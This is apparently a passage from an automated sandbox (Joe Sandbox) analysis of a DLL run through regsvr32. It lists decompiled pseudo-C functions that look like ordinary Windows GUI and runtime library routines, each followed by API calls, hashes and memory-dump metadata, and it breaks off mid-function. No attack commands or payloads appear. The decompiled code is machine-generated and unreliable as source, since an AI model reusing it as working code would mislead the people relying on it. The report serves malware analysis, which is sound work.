                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                • String ID:
                                                                                                                • API String ID: 3058430110-0
                                                                                                                • Opcode ID: ecd38a48816dd1547809e35aa429d4090e2840372f62fd982b930bf1c77b91ba
                                                                                                                • Instruction ID: f5b10cb50f36dbbb41a25a14adddc36c1dd2c7057b1d05655d8c5715ad1880fb
                                                                                                                • Opcode Fuzzy Hash: ecd38a48816dd1547809e35aa429d4090e2840372f62fd982b930bf1c77b91ba
                                                                                                                • Instruction Fuzzy Hash: FC31B031A0024AEFDB11EFA4C8849AE3BE5FF42251F2685BAE451DB1A1E730ED40DB54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 80%
                                                                                                                			E10030C04(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t51;
                                                                                                                				void* _t53;
                                                                                                                				intOrPtr _t68;
                                                                                                                				intOrPtr _t69;
                                                                                                                				intOrPtr _t70;
                                                                                                                				intOrPtr* _t77;
                                                                                                                				signed int _t80;
                                                                                                                				void* _t82;
                                                                                                                				void* _t83;
                                                                                                                				intOrPtr* _t84;
                                                                                                                
                                                                                                                				_t83 = __eflags;
                                                                                                                				_push(0x20);
                                                                                                                				E1003D1E6(E100545B2, __ebx, __edi, __esi);
                                                                                                                				_t80 = 0;
                                                                                                                				 *((intOrPtr*)(_t82 - 0x10)) = 0;
                                                                                                                				 *((intOrPtr*)(_t82 - 0x14)) = 0x1005bb60;
                                                                                                                				_t68 =  *((intOrPtr*)(_t82 + 8));
                                                                                                                				_t71 = _t82 - 0x1c;
                                                                                                                				 *(_t82 - 4) = 0;
                                                                                                                				E100231D3(_t82 - 0x1c, _t83,  *((intOrPtr*)(_t68 - 0xb0)));
                                                                                                                				_t77 =  *((intOrPtr*)(_t82 + 0x14));
                                                                                                                				_t84 = _t77;
                                                                                                                				 *(_t82 - 4) = 1;
                                                                                                                				_t85 = _t84 == 0;
                                                                                                                				if(_t84 == 0) {
                                                                                                                					E1001729E(_t68, _t71, _t77, 0, _t85);
                                                                                                                				}
                                                                                                                				 *_t77 = _t80;
                                                                                                                				if( *((intOrPtr*)(_t68 - 8)) == _t80) {
                                                                                                                					_push(GetDC( *( *((intOrPtr*)( *((intOrPtr*)(_t68 - 0xac)) + 0x20)) + 0x20)));
                                                                                                                					_t51 = E10024520(_t68, _t71, _t77, _t80, __eflags);
                                                                                                                					__eflags = _t51 - _t80;
                                                                                                                					 *((intOrPtr*)(_t68 - 8)) = _t51;
                                                                                                                					if(_t51 == _t80) {
                                                                                                                						goto L3;
                                                                                                                					} else {
                                                                                                                						__eflags =  *(_t82 + 0xc) - _t80;
                                                                                                                						if( *(_t82 + 0xc) != _t80) {
                                                                                                                							IntersectRect(_t82 - 0x2c, _t68 - 0x9c,  *(_t82 + 0xc));
                                                                                                                						} else {
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                							asm("movsd");
                                                                                                                							_t77 =  *((intOrPtr*)(_t82 + 0x14));
                                                                                                                							_t80 = 0;
                                                                                                                						}
                                                                                                                						E100247F5(_t82 - 0x14, _t77, _t82, CreateRectRgnIndirect(_t82 - 0x2c));
                                                                                                                						E100242EC( *((intOrPtr*)(_t68 - 8)), _t82 - 0x14, 1);
                                                                                                                						_t69 =  *((intOrPtr*)(_t68 - 8));
                                                                                                                						__eflags = _t69 - _t80;
                                                                                                                						if(_t69 != _t80) {
                                                                                                                							_t70 =  *((intOrPtr*)(_t69 + 4));
                                                                                                                						} else {
                                                                                                                							_t70 = 0;
                                                                                                                						}
                                                                                                                						__eflags =  *((intOrPtr*)(_t82 - 0x18)) - _t80;
                                                                                                                						 *_t77 = _t70;
                                                                                                                						 *(_t82 - 4) = 0;
                                                                                                                						if( *((intOrPtr*)(_t82 - 0x18)) != _t80) {
                                                                                                                							_push( *((intOrPtr*)(_t82 - 0x1c)));
                                                                                                                							_push(_t80);
                                                                                                                							E10022A6E();
                                                                                                                						}
                                                                                                                						 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
                                                                                                                						 *((intOrPtr*)(_t82 - 0x14)) = 0x100572c4;
                                                                                                                						E10024848(_t82 - 0x14);
                                                                                                                						_t53 = 0;
                                                                                                                						__eflags = 0;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L3:
                                                                                                                					 *(_t82 - 4) = 0;
                                                                                                                					if( *((intOrPtr*)(_t82 - 0x18)) != _t80) {
                                                                                                                						_push( *((intOrPtr*)(_t82 - 0x1c)));
                                                                                                                						_push(_t80);
                                                                                                                						E10022A6E();
                                                                                                                					}
                                                                                                                					 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
                                                                                                                					 *((intOrPtr*)(_t82 - 0x14)) = 0x100572c4;
                                                                                                                					E10024848(_t82 - 0x14);
                                                                                                                					_t53 = 0x80004005;
                                                                                                                				}
                                                                                                                				return E1003D2BE(_t53);
                                                                                                                			}













                                                                                                                0x10030d13
                                                                                                                0x10030d1a
                                                                                                                0x10030d1f
                                                                                                                0x10030d1f
                                                                                                                0x10030d1f
                                                                                                                0x10030c4e
                                                                                                                0x10030c4e
                                                                                                                0x10030c51
                                                                                                                0x10030c55
                                                                                                                0x10030c57
                                                                                                                0x10030c5a
                                                                                                                0x10030c5b
                                                                                                                0x10030c5b
                                                                                                                0x10030c60
                                                                                                                0x10030c67
                                                                                                                0x10030c6e
                                                                                                                0x10030c73
                                                                                                                0x10030c73
                                                                                                                0x10030d26

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10030C0B
                                                                                                                  • Part of subcall function 1001729E: __CxxThrowException@8.LIBCMT ref: 100172B2
                                                                                                                  • Part of subcall function 1001729E: __EH_prolog3.LIBCMT ref: 100172BF
                                                                                                                • GetDC.USER32(?), ref: 10030C89
                                                                                                                • IntersectRect.USER32(?,?,?), ref: 10030CC3
                                                                                                                • CreateRectRgnIndirect.GDI32(?), ref: 10030CCD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3Rect$CreateException@8IndirectIntersectThrow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2872313494-0
                                                                                                                • Opcode ID: d40ffe5e57ff589968931c0e7febde9010e709559e773ddb4ea559703d51cb4a
                                                                                                                • Instruction ID: c2919768b431c96dfd77b3d7ef37b00928705a951f8546859b09235c5aa3cb2f
                                                                                                                • Opcode Fuzzy Hash: d40ffe5e57ff589968931c0e7febde9010e709559e773ddb4ea559703d51cb4a
                                                                                                                • Instruction Fuzzy Hash: 4F318B35D0122ADFCF02CFE4D885A9EBBB8FF08300F518155F905AB191CB70AA44CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E1002DF03(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				intOrPtr _t29;
                                                                                                                				intOrPtr _t32;
                                                                                                                				intOrPtr _t35;
                                                                                                                				intOrPtr _t36;
                                                                                                                				intOrPtr _t37;
                                                                                                                				signed int _t39;
                                                                                                                				void* _t47;
                                                                                                                				intOrPtr* _t48;
                                                                                                                				void* _t50;
                                                                                                                				void* _t51;
                                                                                                                				void* _t64;
                                                                                                                				void* _t65;
                                                                                                                				intOrPtr _t66;
                                                                                                                				void* _t68;
                                                                                                                				void* _t70;
                                                                                                                
                                                                                                                				_t65 = __edi;
                                                                                                                				_t64 = __edx;
                                                                                                                				_t51 = E100231BA(_t50, __ecx, __edi, _t68, __eflags);
                                                                                                                				_t29 =  *((intOrPtr*)(_t51 + 0x10));
                                                                                                                				if(_t29 == 0) {
                                                                                                                					L19:
                                                                                                                					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
                                                                                                                				}
                                                                                                                				_t32 = _t29 - 1;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
                                                                                                                				if(_t32 != 0) {
                                                                                                                					goto L19;
                                                                                                                				}
                                                                                                                				if(_a4 == 0) {
                                                                                                                					L8:
                                                                                                                					_push(_t65);
                                                                                                                					_t66 =  *((intOrPtr*)(E10023187(_t51, _t65, 0, _t77) + 4));
                                                                                                                					_t70 = E1002D1A1(0x10070af4);
                                                                                                                					if(_t70 == 0 || _t66 == 0) {
                                                                                                                						L18:
                                                                                                                						goto L19;
                                                                                                                					} else {
                                                                                                                						_t35 =  *((intOrPtr*)(_t70 + 0xc));
                                                                                                                						_t80 = _t35;
                                                                                                                						if(_t35 == 0) {
                                                                                                                							L12:
                                                                                                                							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
                                                                                                                								_t36 =  *((intOrPtr*)(_t70 + 0xc));
                                                                                                                								_a4 = _a4 & 0x00000000;
                                                                                                                								_t83 = _t36;
                                                                                                                								if(_t36 != 0) {
                                                                                                                									_push(_t36);
                                                                                                                									_t39 = E1004156B(_t51, _t64, _t66, _t70, _t83);
                                                                                                                									_push( *((intOrPtr*)(_t70 + 0xc)));
                                                                                                                									_a4 = _t39;
                                                                                                                									E1003B59D(_t51, _t66, _t70, _t83);
                                                                                                                								}
                                                                                                                								_t37 = E1003B4DA(_t51, _t64, _t66, _t70,  *((intOrPtr*)(_t66 + 0x98)));
                                                                                                                								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
                                                                                                                								if(_t37 == 0 && _a4 != _t37) {
                                                                                                                									 *((intOrPtr*)(_t70 + 0xc)) = E1003B4DA(_t51, _t64, _t66, _t70, _a4);
                                                                                                                								}
                                                                                                                							}
                                                                                                                							goto L18;
                                                                                                                						}
                                                                                                                						_push(_t35);
                                                                                                                						if(E1004156B(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
                                                                                                                							goto L18;
                                                                                                                						}
                                                                                                                						goto L12;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				if(_a4 != 0xffffffff) {
                                                                                                                					_t47 = E10023206();
                                                                                                                					if(_t47 != 0) {
                                                                                                                						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
                                                                                                                						_t77 = _t48;
                                                                                                                						if(_t48 != 0) {
                                                                                                                							 *_t48(0, 0);
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				E1002DE37(_t51,  *((intOrPtr*)(_t51 + 0x20)), _t65);
                                                                                                                				E1002DE37(_t51,  *((intOrPtr*)(_t51 + 0x1c)), _t65);
                                                                                                                				E1002DE37(_t51,  *((intOrPtr*)(_t51 + 0x18)), _t65);
                                                                                                                				E1002DE37(_t51,  *((intOrPtr*)(_t51 + 0x14)), _t65);
                                                                                                                				E1002DE37(_t51,  *((intOrPtr*)(_t51 + 0x24)), _t65);
                                                                                                                				goto L8;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __msize_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1288803200-0
                                                                                                                • Opcode ID: c604cdb1ac1694098f500fcf6eebba443d2bc496ac9e967a338fbdfcaf44ed65
                                                                                                                • Instruction ID: 8653847d44943ef48ff8e6c78178e48b2ea11dbf30873dab36e413152f37f1e6
                                                                                                                • Opcode Fuzzy Hash: c604cdb1ac1694098f500fcf6eebba443d2bc496ac9e967a338fbdfcaf44ed65
                                                                                                                • Instruction Fuzzy Hash: 832182352006109FCB85FF20E982E6A77E4EF40694B91857BE81ACB592DB30EC51CB89
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 95%
                                                                                                                			E10004790(void* __ecx, int _a4, intOrPtr _a8) {
                                                                                                                				intOrPtr _v0;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				int _t40;
                                                                                                                				int _t45;
                                                                                                                				int _t57;
                                                                                                                				int _t71;
                                                                                                                				void* _t74;
                                                                                                                				intOrPtr _t83;
                                                                                                                
                                                                                                                				_t57 = _a4;
                                                                                                                				_t74 = __ecx;
                                                                                                                				if(_t57 == 0) {
                                                                                                                					return 1;
                                                                                                                				} else {
                                                                                                                					_t2 = _t57 + 4; // 0x10060324
                                                                                                                					_t40 = GetMenuItemCount( *_t2);
                                                                                                                					_t71 = 0;
                                                                                                                					_a4 = _t40;
                                                                                                                					if(_t40 <= 0) {
                                                                                                                						return 1;
                                                                                                                					} else {
                                                                                                                						do {
                                                                                                                							E100229F2(_t57, _t57, _t71, _t74 + 8 + ( *(_t74 + 0xf8) +  *(_t74 + 0xf8) * 2) * 4, 0x400);
                                                                                                                							_t10 = _t57 + 4; // 0x10060324
                                                                                                                							_t45 = GetMenuItemID( *_t10, _t71);
                                                                                                                							if(_t45 == 0xffffffff && _a8 != 0) {
                                                                                                                								_t45 = 0xfffffffe;
                                                                                                                							}
                                                                                                                							 *(_t74 + 0x10 + ( *(_t74 + 0xf8) +  *(_t74 + 0xf8) * 2) * 4) = _t45;
                                                                                                                							if(_t45 > 0) {
                                                                                                                								 *((intOrPtr*)(_t74 + ( *(_t74 + 0xf8) + 1 + ( *(_t74 + 0xf8) + 1) * 2) * 4)) =  *((intOrPtr*)(_t74 + 0xfc));
                                                                                                                								_t24 = _t74 + 0xfc;
                                                                                                                								 *_t24 =  *((intOrPtr*)(_t74 + 0xfc)) + 1;
                                                                                                                								_t83 =  *_t24;
                                                                                                                							}
                                                                                                                							_t31 = _t57 + 4; // 0x10060324
                                                                                                                							ModifyMenuA( *_t31, _t71, 0x500,  *(_t74 + ( *(_t74 + 0xf8) +  *(_t74 + 0xf8) * 2) * 4 + 0x10), _t74 + ( *(_t74 + 0xf8) +  *(_t74 + 0xf8) * 2) * 4 + 8);
                                                                                                                							 *(_t74 + 0xf8) =  *(_t74 + 0xf8) + 1;
                                                                                                                							_t36 = _t57 + 4; // 0x10060324
                                                                                                                							_push(GetSubMenu( *_t36, _t71));
                                                                                                                							if(E10022961(_t57,  *_t31, _t71, _t74, _t83) != 0) {
                                                                                                                								E10004790(_t74, _t51, 0);
                                                                                                                							}
                                                                                                                							_t71 = _t71 + 1;
                                                                                                                						} while (_t71 < _v0);
                                                                                                                						return 1;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • GetMenuItemCount.USER32(10060324), ref: 100047A5
                                                                                                                  • Part of subcall function 100229F2: GetMenuStringA.USER32 ref: 10022A0D
                                                                                                                  • Part of subcall function 100229F2: GetMenuStringA.USER32 ref: 10022A2E
                                                                                                                • GetMenuItemID.USER32(10060324,00000000), ref: 100047E0
                                                                                                                • ModifyMenuA.USER32(10060324,00000000,00000500,?,?), ref: 10004842
                                                                                                                • GetSubMenu.USER32 ref: 10004850
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$ItemString$CountModify
                                                                                                                • String ID:
                                                                                                                • API String ID: 2546154514-0
                                                                                                                • Opcode ID: 42cd8560699709697a9cced2968adb864664a594a4e7480527313fa351ed6223
                                                                                                                • Instruction ID: deee462cda47ce2732a792b11f20996d373c355acb8ee64d9fe90b95aaef22d5
                                                                                                                • Opcode Fuzzy Hash: 42cd8560699709697a9cced2968adb864664a594a4e7480527313fa351ed6223
                                                                                                                • Instruction Fuzzy Hash: C7318F752006029BE760DF28D884FA6B3E8EB84754F42896DF555CB295EB71F848CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 76%
                                                                                                                			E1003A9AC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				int _t34;
                                                                                                                				intOrPtr* _t62;
                                                                                                                				void* _t63;
                                                                                                                				void* _t64;
                                                                                                                
                                                                                                                				_t64 = __eflags;
                                                                                                                				_push(0x24);
                                                                                                                				E1003D1E6(E10054E96, __ebx, __edi, __esi);
                                                                                                                				_t62 =  *((intOrPtr*)(_t63 + 8)) + 0xffffffc0;
                                                                                                                				E100231D3(_t63 - 0x14, _t64,  *((intOrPtr*)( *((intOrPtr*)(_t63 + 8)) - 0x24)));
                                                                                                                				 *(_t63 - 4) = 0;
                                                                                                                				if( *((intOrPtr*)(_t63 + 0x10)) <=  *((intOrPtr*)(_t62 + 0x3c))) {
                                                                                                                					L8:
                                                                                                                					__eflags =  *(_t62 + 0x30);
                                                                                                                					if( *(_t62 + 0x30) == 0) {
                                                                                                                						_t34 = PeekMessageA(_t63 - 0x30, 0, 0, 0, 2);
                                                                                                                						__eflags = _t34;
                                                                                                                						if(_t34 != 0) {
                                                                                                                							 *((intOrPtr*)( *_t62 + 0x58))(_t63 - 0x30);
                                                                                                                						}
                                                                                                                						L14:
                                                                                                                						 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
                                                                                                                						if( *(_t63 - 0x10) != 0) {
                                                                                                                							_push( *((intOrPtr*)(_t63 - 0x14)));
                                                                                                                							_push(0);
                                                                                                                							E10022A6E();
                                                                                                                						}
                                                                                                                						L17:
                                                                                                                						return E1003D2BE(1);
                                                                                                                					}
                                                                                                                					L9:
                                                                                                                					 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
                                                                                                                					__eflags =  *(_t63 - 0x10);
                                                                                                                					if( *(_t63 - 0x10) != 0) {
                                                                                                                						_push( *((intOrPtr*)(_t63 - 0x14)));
                                                                                                                						_push(0);
                                                                                                                						E10022A6E();
                                                                                                                					}
                                                                                                                					_push(2);
                                                                                                                					_pop(1);
                                                                                                                					goto L17;
                                                                                                                				}
                                                                                                                				if( *(_t62 + 0x30) != 0) {
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                				_push(_t63 - 0x30);
                                                                                                                				if( *((intOrPtr*)( *_t62 + 0x5c))() == 0 ||  *((intOrPtr*)(_t62 + 0x2c)) == 0) {
                                                                                                                					goto L8;
                                                                                                                				} else {
                                                                                                                					 *(_t62 + 0x30) = 1;
                                                                                                                					do {
                                                                                                                					} while (PeekMessageA(_t63 - 0x30, 0, 0x200, 0x209, 3) != 0);
                                                                                                                					do {
                                                                                                                					} while (PeekMessageA(_t63 - 0x30, 0, 0x100, 0x109, 3) != 0);
                                                                                                                					 *((intOrPtr*)( *_t62 + 0x64))( *((intOrPtr*)(_t63 + 0xc)));
                                                                                                                					 *(_t62 + 0x30) = 0;
                                                                                                                					goto L14;
                                                                                                                				}
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1003A9B3
                                                                                                                • PeekMessageA.USER32(00000001,00000000,00000200,00000209,00000003), ref: 1003AA0D
                                                                                                                • PeekMessageA.USER32(00000001,00000000,00000100,00000109,00000003), ref: 1003AA24
                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 1003AA5E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePeek$H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 3998274959-0
                                                                                                                • Opcode ID: 08d601f7536708ffa6be7cf8b188931ad43e828f65b9250ab0ebf7c79f9c2c95
                                                                                                                • Instruction ID: bbed5bcb0719437d8aa26584325781a19963b2874c79f7070563e1747844a59f
                                                                                                                • Opcode Fuzzy Hash: 08d601f7536708ffa6be7cf8b188931ad43e828f65b9250ab0ebf7c79f9c2c95
                                                                                                                • Instruction Fuzzy Hash: 94318B36A0060AAFDF21DFA4DE95E9E77E8FF05341F010A1AF642AA1C1D770AA40CA11
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 87%
                                                                                                                			E100239FB(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t36;
                                                                                                                				intOrPtr _t40;
                                                                                                                				intOrPtr* _t44;
                                                                                                                				void* _t46;
                                                                                                                				intOrPtr _t47;
                                                                                                                				void* _t48;
                                                                                                                				intOrPtr _t54;
                                                                                                                				void* _t59;
                                                                                                                				intOrPtr* _t71;
                                                                                                                				intOrPtr* _t73;
                                                                                                                				void* _t75;
                                                                                                                				void* _t76;
                                                                                                                
                                                                                                                				_t76 = __eflags;
                                                                                                                				_push(0x60);
                                                                                                                				E1003D219(E10053862, __ebx, __edi, __esi);
                                                                                                                				_t71 =  *((intOrPtr*)(_t75 + 8));
                                                                                                                				_t73 =  *((intOrPtr*)(_t71 + 4));
                                                                                                                				 *((intOrPtr*)(_t75 - 0x14)) = _t73;
                                                                                                                				E10018895(_t75 - 0x68, _t76);
                                                                                                                				 *(_t75 - 4) = 0;
                                                                                                                				 *(_t75 - 4) = 1;
                                                                                                                				 *((intOrPtr*)(E10022C52(0, _t71, _t73, _t76) + 4)) =  *((intOrPtr*)( *_t71 + 4));
                                                                                                                				_t36 = E10023187(0, _t71, _t73, _t76);
                                                                                                                				_t9 = _t36 + 0x74; // 0x74
                                                                                                                				 *((intOrPtr*)(_t73 + 0x1c)) = _t36;
                                                                                                                				 *((intOrPtr*)(E10022D0E(0, _t9, _t71, _t73, _t76) + 4)) = _t73;
                                                                                                                				E100238D2(_t73, _t76);
                                                                                                                				_t40 =  *((intOrPtr*)(E10023187(0, _t71, _t73, _t76) + 4));
                                                                                                                				if(_t40 != 0 &&  *((intOrPtr*)(_t73 + 0x20)) == 0) {
                                                                                                                					_t54 =  *((intOrPtr*)(_t40 + 0x20));
                                                                                                                					if(_t54 != 0 &&  *((intOrPtr*)(_t54 + 0x20)) != 0) {
                                                                                                                						E10019C57(_t75 - 0x68, _t75,  *((intOrPtr*)(_t54 + 0x20)));
                                                                                                                						 *((intOrPtr*)(_t73 + 0x20)) = _t75 - 0x68;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				 *(_t75 - 4) = 0;
                                                                                                                				_t59 =  *(_t71 + 0x14);
                                                                                                                				SetEvent( *(_t71 + 0x10));
                                                                                                                				WaitForSingleObject(_t59, 0xffffffff);
                                                                                                                				CloseHandle(_t59);
                                                                                                                				_t44 =  *((intOrPtr*)(_t73 + 0x38));
                                                                                                                				_t81 = _t44;
                                                                                                                				if(_t44 == 0) {
                                                                                                                					_t46 =  *((intOrPtr*)( *_t73 + 0x50))();
                                                                                                                					__eflags = _t46;
                                                                                                                					_t47 =  *_t73;
                                                                                                                					if(_t46 != 0) {
                                                                                                                						_t48 =  *((intOrPtr*)(_t47 + 0x54))();
                                                                                                                					} else {
                                                                                                                						_t48 =  *((intOrPtr*)(_t47 + 0x68))();
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t48 =  *_t44( *((intOrPtr*)(_t73 + 0x34)));
                                                                                                                				}
                                                                                                                				E10019C90(_t59, _t75 - 0x68);
                                                                                                                				_push(1);
                                                                                                                				E100235DB(_t75 - 0x68, _t81, _t48);
                                                                                                                				 *(_t75 - 4) =  *(_t75 - 4) | 0xffffffff;
                                                                                                                				E1001A3E3(_t59, _t75 - 0x68, _t71, _t48, _t81);
                                                                                                                				return E1003D2BE(0);
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 10023A02
                                                                                                                  • Part of subcall function 100238D2: GetCurrentThreadId.KERNEL32 ref: 100238E5
                                                                                                                  • Part of subcall function 100238D2: SetWindowsHookExA.USER32(000000FF,Function_0002373E,00000000,00000000), ref: 100238F5
                                                                                                                • SetEvent.KERNEL32(?,00000060), ref: 10023AAF
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10023AB8
                                                                                                                • CloseHandle.KERNEL32(?), ref: 10023ABF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCurrentEventH_prolog3_catchHandleHookObjectSingleThreadWaitWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 1532457625-0
                                                                                                                • Opcode ID: 470b81a69e69308e87bf9dd7fdd099998e305917592de0039beec760d3206212
                                                                                                                • Instruction ID: 91d5618217ead3b992386f55b2444b571cb73ca952898fd6defaaeb9cdb1d30a
                                                                                                                • Opcode Fuzzy Hash: 470b81a69e69308e87bf9dd7fdd099998e305917592de0039beec760d3206212
                                                                                                                • Instruction Fuzzy Hash: 94314B78A00705DFCB14DFB4D98595DBBF0FF08310B91866DE58A9B2A2DB31EA41CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 20%
                                                                                                                			E1001DCBB(intOrPtr __ebx, intOrPtr* __ecx, intOrPtr __esi, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				signed char _v264;
                                                                                                                				void* __edi;
                                                                                                                				signed int _t11;
                                                                                                                				signed int _t14;
                                                                                                                				void* _t16;
                                                                                                                				char _t19;
                                                                                                                				signed int _t22;
                                                                                                                				intOrPtr _t23;
                                                                                                                				signed int* _t34;
                                                                                                                				CHAR* _t36;
                                                                                                                				signed int _t37;
                                                                                                                
                                                                                                                				_t35 = __esi;
                                                                                                                				_t26 = __ebx;
                                                                                                                				_t11 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_v8 = _t11 ^ _t37;
                                                                                                                				_t34 = _a8;
                                                                                                                				_push(0x100);
                                                                                                                				_t33 =  &_v264;
                                                                                                                				_push( &_v264);
                                                                                                                				_push(_a4);
                                                                                                                				_t14 =  *((intOrPtr*)( *__ecx + 0x7c))();
                                                                                                                				if(_t14 != 0) {
                                                                                                                					_push(__ebx);
                                                                                                                					_push(__esi);
                                                                                                                					_t36 =  &_v264;
                                                                                                                					_t16 = E1003C669(_v264 & 0x000000ff);
                                                                                                                					while(_t16 != 0) {
                                                                                                                						_t36 = CharNextA(_t36);
                                                                                                                						_t16 = E1003C669( *_t36 & 0x000000ff);
                                                                                                                					}
